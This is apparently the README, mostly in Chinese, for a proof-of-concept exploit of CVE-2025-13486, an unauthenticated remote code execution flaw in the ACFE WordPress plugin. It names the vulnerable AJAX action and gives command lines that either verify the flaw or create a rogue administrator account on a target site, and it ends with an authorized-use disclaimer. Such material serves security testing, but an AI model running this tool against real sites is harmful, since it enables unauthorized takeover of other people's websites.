CVE-2025-13486 的概念验证(PoC)漏洞利用,针对 Advanced Custom Fields: Extended (ACFE) WordPress 插件中的远程代码执行漏洞。
该漏洞存在于 ACFE 0.9.0.5 至 0.9.1.1 版本中,允许未经身份验证的攻击者通过 acfe/form/render_form_ajax AJAX 操作执行任意 PHP 函数。该插件在使用 call_user_func_array() 时未对用户输入进行适当验证。
print_r 安全验证目标是否存在漏洞(非破坏性)pip install requests
python poc.py -u http://target-site.com --verify
# With random credentials (displayed after execution)
python poc.py -u http://target-site.com
# With custom credentials
python poc.py -u http://target-site.com --user admin123 --password P@ssw0rd! --email [email protected]
-u, --url Target WordPress URL (required)
--verify Only verify vulnerability (safer, uses print_r)
--user Username to create (default: random)
--password Password to set (default: random)
--email Email address to set (default: random)
此 PoC 仅供教育和授权安全测试目的使用。未经授权访问计算机系统是违法的。请在测试前始终获得适当授权。